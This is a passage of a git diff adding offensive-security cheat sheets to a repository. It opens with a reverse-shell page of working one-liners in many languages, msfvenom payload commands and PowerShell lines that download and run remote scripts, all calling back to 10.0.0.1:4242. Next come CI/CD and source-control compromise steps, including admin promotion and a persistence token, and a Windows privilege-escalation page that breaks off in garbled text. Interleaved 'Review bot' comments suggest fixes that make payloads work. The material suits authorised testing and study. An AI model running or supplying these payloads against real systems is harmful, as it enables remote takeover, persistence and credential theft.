'$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' +``` + +```bash +php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' +``` + +### Ruby + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + +ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.0.0.1","4242");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}' + +NOTE: Windows only +ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4242");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` + +### Rust + +```rust +use std::net::TcpStream; +use std::os::unix::io::{AsRawFd, FromRawFd}; +use std::process::{Command, Stdio}; + +fn main() { + let s = TcpStream::connect("10.0.0.1:4242").unwrap(); + let fd = s.as_raw_fd(); + Command::new("/bin/sh") + .arg("-i") + .stdin(unsafe { Stdio::from_raw_fd(fd) }) + .stdout(unsafe { Stdio::from_raw_fd(fd) }) + .stderr(unsafe { Stdio::from_raw_fd(fd) }) + .spawn() + .unwrap() + .wait() + .unwrap(); +} +``` +### Golang + +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` + +### Netcat Traditional + +```bash +nc -e /bin/sh 10.0.0.1 4242 +nc -e /bin/bash 10.0.0.1 4242 +nc -c bash 10.0.0.1 4242 +``` + +### Netcat OpenBsd + +```bash +rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +``` + +### Netcat BusyBox + +```bash +rm 
-f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +``` + +### Ncat + +```bash +ncat 10.0.0.1 4242 -e /bin/bash +ncat --udp 10.0.0.1 4242 -e /bin/bash +``` + +### OpenSSL + +Attacker: +```powershell +user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes +user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242 +or +user@attack$ ncat --ssl -vv -l -p 4242 + +user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s +``` + +TLS-PSK (does not rely on PKI or self-signed certificates) +```bash +# generate 384-bit PSK +# use the generated string as a value for the two PSK variables from below +openssl rand -hex 48 +# server (attacker) +export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT +# client (victim) +export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE +``` + +### Powershell + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +```powershell +powershell -nop -c "$client = New-Object 
System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" +``` + +```powershell +powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') +``` + +### Awk + +```powershell +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` + +### Java + +```java +Runtime r = Runtime.getRuntime(); +Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do $line 2>&5 >&5; done'"); +p.waitFor(); + +``` + +#### Java Alternative 1 + +```java +String host="127.0.0.1"; +int port=4444; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); + +``` + +#### Java Alternative 2 +**NOTE**: This is more stealthy + +```java +Thread thread = new Thread(){ + public void run(){ + // Reverse shell here + } +} +thread.start(); +``` + +### Telnet +```bash +In Attacker machine start two listeners: +nc 
-lvp 8080 +nc -lvp 8081 + +In Victime machine run below command: +telnet 8080 | /bin/sh | telnet 8081 +``` + +### War + +```java +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war +strings reverse.war | grep jsp # in order to get the name of the file +``` + + +### Lua + +Linux only + +```powershell +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');" +``` + +Windows and Linux + +```powershell +lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` + +### NodeJS + +```javascript +(function(){ + var net = require("net"), + cp = require("child_process"), + sh = cp.spawn("/bin/sh", []); + var client = new net.Socket(); + client.connect(4242, "10.0.0.1", function(){ + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + }); + return /a/; // Prevents the Node.js application from crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242') + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash') + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` + +### Groovy + +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) +NOTE: Java reverse shell also work for Groovy + +```java +String host="10.0.0.1"; +int port=4242; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream 
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` + +#### Groovy Alternative 1 +**NOTE**: This is more stealthy + +```java +Thread.start { + // Reverse shell here +} +``` + +### C + +Compile with `gcc /tmp/shell.c --output csh && csh` + +```csharp +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = 4242; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + + return 0; +} +``` + +### Dart + +```java +import 'dart:io'; +import 'dart:convert'; + +main() { + Socket.connect("10.0.0.1", 4242).then((socket) { + socket.listen((data) { + Process.start('powershell.exe', []).then((Process process) { + process.stdin.writeln(new String.fromCharCodes(data).trim()); + process.stdout + .transform(utf8.decoder) + .listen((output) { socket.write(output); }); + }); + }, + onDone: () { + socket.destroy(); + }); + }); +} +``` + +## Meterpreter Shell + +### Windows Staged reverse TCP + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe +``` + +### Windows Stageless reverse TCP + +```powershell +msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe +``` + +### Linux Staged reverse TCP + +```powershell +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf +``` + +### Linux Stageless reverse TCP + 
+```powershell +msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf +``` + +### Other platforms + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` + +## Spawn TTY Shell + +In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`. + +```powershell +rlwrap nc 10.0.0.1 4242 + +rlwrap -r -f . nc 10.0.0.1 4242 +-f . will make rlwrap use the current history file as a completion word list. +-r Put all words seen on in- and output on the completion list. +``` + +Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell. + +:warning: OhMyZSH might break this trick, a simple `sh` is recommended + +> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] 
If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect + +```powershell +ctrl+z +echo $TERM && tput lines && tput cols + +# for bash +stty raw -echo +fg + +# for zsh +stty raw -echo; fg + +reset +export SHELL=bash +export TERM=xterm-256color +stty rows columns +``` + +or use `socat` binary to get a fully tty reverse shell + +```bash +socat file:`tty`,raw,echo=0 tcp-listen:12345 +``` + +Alternatively, `rustcat` binary can automatically inject the TTY shell command. + +The shell will be automatically upgraded and the TTY size will be provided for manual adjustment. +Not only that, upon exiting the shell, the terminal will be reset and thus usable. + +```bash +stty raw -echo; stty size && rcat l -ie "/usr/bin/script -qc /bin/bash /dev/null" 6969 && reset +``` + + +Spawn a TTY shell from an interpreter + +```powershell +/bin/sh -i +python3 -c 'import pty; pty.spawn("/bin/sh")' +python3 -c "__import__('pty').spawn('/bin/bash')" +python3 -c "__import__('subprocess').call(['/bin/bash'])" +perl -e 'exec "/bin/sh";' +perl: exec "/bin/sh"; +perl -e 'print `/bin/bash`' +ruby: exec "/bin/sh" +lua: os.execute('/bin/sh') +``` + +- vi: `:!bash` +- vi: `:set shell=/bin/bash:shell` +- nmap: `!sh` +- mysql: `! bash` + +Alternative TTY method + +``` +www-data@debian:/dev/shm$ su - user +su: must be run from a terminal + +www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null +www-data@debian:/dev/shm$ su - user +Password: P4ssW0rD + +user@debian:~$ +``` + +## Fully interactive reverse shell on Windows +The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. + +**ConPtyShell uses the function [CreatePseudoConsole()](https://docs.microsoft.com/en-us/windows/console/createpseudoconsole). 
This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).** + + +Server Side: + +``` +stty raw -echo; (stty size; cat) | nc -lvnp 3001 +``` + +Client Side: + +``` +IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001 +``` + +Offline version of the ps1 available at --> https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1 + +## References + +* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) +* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +* [Spawning a TTY Shell](http://netsec.ws/?p=337) +* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell) diff --git a/docs/pentest/Source Code Management.md b/docs/pentest/Source Code Management.md new file mode 100644 index 0000000..6a450b0 --- /dev/null +++ b/docs/pentest/Source Code Management.md 
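Review bot: the "Telnet" snippet in this hunk is missing the attacker address, so `telnet 8080 | /bin/sh | telnet 8081` cannot connect anywhere; it should read `telnet 10.0.0.1 8080 | /bin/sh | telnet 10.0.0.1 8081` to match the listeners shown just above it. Several other items in the same file need a fix before merge: "Java Alternative 2" closes the anonymous `Thread` subclass with `}` and no `;`, which does not compile; in "Spawn TTY Shell" the line `stty rows columns` is a placeholder that errors as written and should show where the `tput lines` / `tput cols` values go (`stty rows <lines> columns <cols>`); under "## Meterpreter Shell" the two "Stageless" entries use `windows/shell_reverse_tcp` and `linux/x86/shell_reverse_tcp`, which are plain shell payloads rather than Meterpreter (the stageless Meterpreter payloads are `windows/meterpreter_reverse_tcp` and `linux/x86/meterpreter_reverse_tcp`), so either rename the headings or swap the payloads; the Summary links "Automatic Reverse Shell Generator" to `#revshells`, a heading that does not exist, and omits the "Fully interactive reverse shell on Windows" section. On presentation, the C example is fenced as `csharp` and its `#include` lines carry no header names as shown, the Dart example is fenced as `java`, shell one-liners (Socat, OpenSSL, Awk, Lua) are fenced as `powershell`, and the last "Other platforms" line breaks off after `echo '` with an unbalanced quote. Finally, the PHP one-liners rely on the socket being file descriptor 3, which holds for `php -r` but not necessarily inside a web-server worker; a one-line caveat there would save readers some debugging.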
@@ -0,0 +1,133 @@ +# Source Code Management & CI/CD Compromise + +> + +## Summary + +* [Tools](#tools) +* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets) +* [Personal Access Token](#personal-access-token) +* [Gitlab CI/Github Actions](#gitlab-cigithub-actions) +* [References](#references) + + +## Tools + +* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - List the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines +* [xforcered/SCMKit](https://github.com/xforcered/SCMKit) - Source Code Management Attack Toolkit + + +## Enumerate repositories files and secrets + +Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit) + +* Discover repositories being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local + ``` +* Search for repositories by repository name in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* Search for code containing a given keyword in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term" + ``` +* Search for files in repositories containing a given keyword in the file name in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* List snippets owned by the current user 
in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local + ``` +* List all GitLab runners available to the current user in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local + ``` +* Get the assigned privileges to an access token being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local + ``` +* Promote a normal user to an administrative role in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName + ``` +* Create/List/Delete an access token to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID + SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser + SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser + ``` +* Create/List an SSH key to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m listsshkey -c userName:password -u 
https://github.something.local + SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local + SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID + SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID + ``` + +## Personal Access Token + +Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. + +```ps1 +curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" +``` + +## Gitlab CI/Github Actions + +* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` + ```yaml + stages: + - test + + test: + stage: test + script: + - | + whoami + parallel: + matrix: + - RUNNER: VM1 + - RUNNER: VM2 + - RUNNER: VM3 + tags: + - ${RUNNER} + ``` +* Github Action "Command Execution" example: `.github/workflows/example.yml` + ```yml + name: example + on: + workflow_dispatch: + push: + branches: [ main ] + pull_request: + branches: [ main ] + + jobs: + build: + runs-on: windows-2019 + + steps: + - name: Execute + run: | + whoami + ``` + +## References + +* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) +* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, ThĂŠo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) \ No newline at end of file diff --git a/docs/pentest/Windows - Privilege Escalation.md b/docs/pentest/Windows - Privilege Escalation.md new file mode 100644 index 0000000..365e3db --- /dev/null +++ b/docs/pentest/Windows - Privilege Escalation.md 
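Review bot: the two `listsshkey` examples in this hunk pair `-s gitlab` with `-u https://github.something.local`, a copy-paste mismatch with every other GitLab example in the list (`gitlab.something.local`). In the "Personal Access Token" section, `POST /api/v4/users/:id/personal_access_tokens` is GitLab's administrator-only endpoint for minting a token on behalf of another user, so the text should say the `apiToken` used in `PRIVATE-TOKEN` must belong to an admin, otherwise the request is rejected; `--data "expires_at="` is also sent empty, which is worth a word since it leaves the lifetime to the instance default. The empty `> ` blockquote under the title should either carry the one-line description the other pages use or be dropped, and the second reference mis-encodes the author name as "ThĂŠo Louis-Tisserand" (should be "Théo").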
@@ -0,0 +1,1536 @@ +# Windows - Privilege Escalation + +## Summary + +* [Tools](#tools) +* [Windows Version and Configuration](#windows-version-and-configuration) +* [User Enumeration](#user-enumeration) +* [Network Enumeration](#network-enumeration) +* [Antivirus Enumeration](#antivirus-enumeration) +* [Default Writeable Folders](#default-writeable-folders) +* [EoP - Looting for passwords](#eop---looting-for-passwords) + * [SAM and SYSTEM files](#sam-and-system-files) + * [HiveNightmare](#hivenightmare) + * [LAPS Settings](#laps-settings) + * [Search for file contents](#search-for-file-contents) + * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) + * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) + * [Passwords in unattend.xml](#passwords-in-unattendxml) + * [Wifi passwords](#wifi-passwords) + * [Sticky Notes passwords](#sticky-notes-passwords) + * [Passwords stored in services](#passwords-stored-in-services) + * [Passwords stored in Key Manager](#passwords-stored-in-key-manager) + * [Powershell History](#powershell-history) + * [Powershell Transcript](#powershell-transcript) + * [Password in Alternate Data Stream](#password-in-alternate-data-stream) +* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) +* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) +* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) +* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) +* [EoP - $PATH Interception](#eop---path-interception) +* [EoP - Named Pipes](#eop---named-pipes) +* [EoP - Kernel Exploitation](#eop---kernel-exploitation) +* [EoP - Microsoft Windows Installer](#eop---microsoft-windows-installer) + * [AlwaysInstallElevated](#alwaysinstallelevated) + * [CustomActions](#customactions) +* [EoP - Insecure GUI apps](#eop---insecure-gui-apps) +* [EoP - Evaluating Vulnerable 
Drivers](#eop---evaluating-vulnerable-drivers) +* [EoP - Printers](#eop---printers) + * [Universal Printer](#universal-printer) + * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) +* [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) +* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) +* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) +* [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) + * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) + * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) + * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) + * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) + * [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug))) +* [EoP - Privileged File Write](#eop---privileged-file-write) + * [DiagHub](#diaghub) + * [UsoDLLLoader](#usodllloader) + * [WerTrigger](#wertrigger) + * [WerMgr](#wermgr) +* [EoP - Privileged File Delete](#eop---privileged-file-delete) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) + * [MS08-067 (NetAPI)](#ms08-067-netapi) + * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) + * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) + * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) + * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) + * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) + * [CVE-2019-1388](#cve-2019-1388) +* [EoP - $PATH Interception](#eop---path-interception) +* [References](#references) + 
+## Tools + +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` +- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) +- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) + ```powershell + powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 + ``` +- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) +- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) + ```powershell + ./windows-exploit-suggester.py --update + ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt + ``` +- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) +- [WindowsExploits - Windows exploits, mostly precompiled. 
Not being updated.](https://github.com/abatchy17/WindowsExploits) +- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) +- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) + ```powershell + Seatbelt.exe -group=all -full + Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" + Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" + ``` +- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) +- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) + ```powershell + powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt + ``` +- [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) +- [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) + ```powershell + # First obtain systeminfo + systeminfo + systeminfo > systeminfo.txt + # Then feed it to wesng + python3 wes.py --update-wes + python3 wes.py --update + python3 wes.py systeminfo.txt + ``` +- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck) + ```powershell + C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" + C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" + C:\Temp\>powershell -ep bypass -c ". 
.\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML" + ``` + +## Windows Version and Configuration + +```powershell +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Extract patchs and updates +```powershell +wmic qfe +``` + +Architecture + +```powershell +wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% +``` + +List all env variables + +```powershell +set +Get-ChildItem Env: | ft Key,Value +``` + +List all drives + +```powershell +wmic logicaldisk get caption || fsutil fsinfo drives +wmic logicaldisk get caption,description,providername +Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root +``` + +## User Enumeration + +Get current username + +```powershell +echo %USERNAME% || whoami +$env:username +``` + +List user privilege + +```powershell +whoami /priv +whoami /groups +``` + +List all users + +```powershell +net user +whoami /all +Get-LocalUser | ft Name,Enabled,LastLogon +Get-ChildItem C:\Users -Force | select Name +``` + +List logon requirements; useable for bruteforcing + +```powershell$env:usernadsc +net 